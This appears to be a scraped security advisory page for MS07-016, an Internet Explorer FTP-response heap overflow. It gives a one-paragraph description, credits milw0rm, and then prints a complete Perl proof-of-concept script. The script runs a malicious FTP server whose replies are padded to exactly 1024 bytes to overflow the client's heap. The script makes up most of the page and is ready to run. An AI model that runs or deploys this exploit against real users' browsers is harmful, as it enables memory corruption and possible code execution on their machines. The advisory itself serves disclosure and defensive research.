|
|
|
|
| |
| A remote code execution vulnerability exists in the way Internet Explorer interprets certain responses from FTP servers. An attacker could exploit the vulnerability by sending specially crafted FTP responses in an FTP session to the FTP client included in Internet Explorer. |
| |
Credit:
The information has been provided by milw0rm.
The original article can be found at:
http://www.milw0rm.com/exploits/3444
|
| |
Exploit:
#!/usr/bin/perl
# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# or at '\r\n'. Each buffer is apended with \x00, without
# bounds checking. If the response is exctly 1024 characters
# in length, you will overflow the heap with the string \x00.
use IO::Socket;
use strict;
# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
LocalHost=>$ip,
LocalPort=>'21',
Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
# Wait for initial connection and send banner
my $sock_in = $sock->accept();
print $sock_in "220 waa waa wee waa\r\n";
# Send response code with total lenght of response = 1024
while (<$sock_in>){
my $response;
if($_ eq "USER") { $response="331 ";}
elsif($_ eq "PASS") { $response="230 ";}
elsif($_ eq "syst") { $response="215 ";}
elsif($_ eq "CWD") { $response="250 ";}
elsif($_ eq "PWD") { $response="230 ";}
else { $response="200 ";}
print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
}
close($sock);
|
|
|
|
|
